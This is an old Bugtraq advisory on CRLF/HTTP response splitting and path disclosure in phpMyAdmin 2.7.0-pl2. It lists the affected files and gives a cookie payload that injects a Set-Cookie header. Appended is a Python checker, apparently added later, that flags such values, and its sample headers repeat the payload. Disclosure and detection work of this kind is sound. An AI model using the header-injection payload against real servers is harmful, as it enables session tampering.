Date: 3 Dec 2006 19:26:23 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting
*************************************************************************************
# Title : PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting Vulnerability
# Author : ajann
# Contact : :(
# Tested : Just 2.7.0-pl2
*************************************************************************************
[[CRLF]]]------------------------------------------------------
Files----
/css/phpmyadmin.css.php
/db_create.php
/index.php
/left.php
/libraries/session.inc.php
/libraries/transformations/overview.php
/querywindow.php
/server_engines.php
/...
/..
/Files----
Cookie:
->Open Cookie Editor
->Find the phpMyAdmin value
->Write it ;
phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue
New Cookie => some=value
.....
..
[[/CRLF]]]
[[PATH]]]------------------------------------------------------
File----
//libraries/common.lib.php
/File----
[[/PATH]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
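
A defensive check for the cookie case reported above, as an added example that is not part of the original post or of phpMyAdmin: it flags a phpMyAdmin cookie whose value decodes to CR or LF, the condition that lets a reflected value add a header such as the Set-Cookie shown in the advisory. The allowed character set, the function names and the sample headers are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: a session id is a short plain token; adjust to the deployed format.
SAFE_VALUE = re.compile(r"[A-Za-z0-9,-]{1,128}")

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded %250d%250a is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def parse_cookie_header(header):
    """Split a raw Cookie request header into (name, raw_value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, value))
    return pairs

def check_cookie(header, name="phpMyAdmin"):
    """Return 'ok', 'absent', 'crlf' or 'malformed' for the named cookie."""
    for cookie_name, raw in parse_cookie_header(header):
        if cookie_name != name:
            continue
        decoded = decode_fully(raw)
        if "\r" in decoded or "\n" in decoded:
            return "crlf"       # value would break out of the header line
        if not SAFE_VALUE.fullmatch(decoded):
            return "malformed"  # not CR/LF, but not a plain token either
        return "ok"
    return "absent"

# Constructed sample headers; the second carries the value from the advisory.
SAMPLES = [
    "phpMyAdmin=8f3c2a9d1b7e4f60a1c2d3e4f5a6b7c8; other=1",
    "phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue",
    "phpMyAdmin=%250d%250aSet-Cookie%253Asome%253Dvalue",
    "other=1",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_cookie(sample), "<-", sample)
```

Rejecting the request when the result is anything other than 'ok' or 'absent' keeps the value out of every response header, whichever of the listed files would have reflected it.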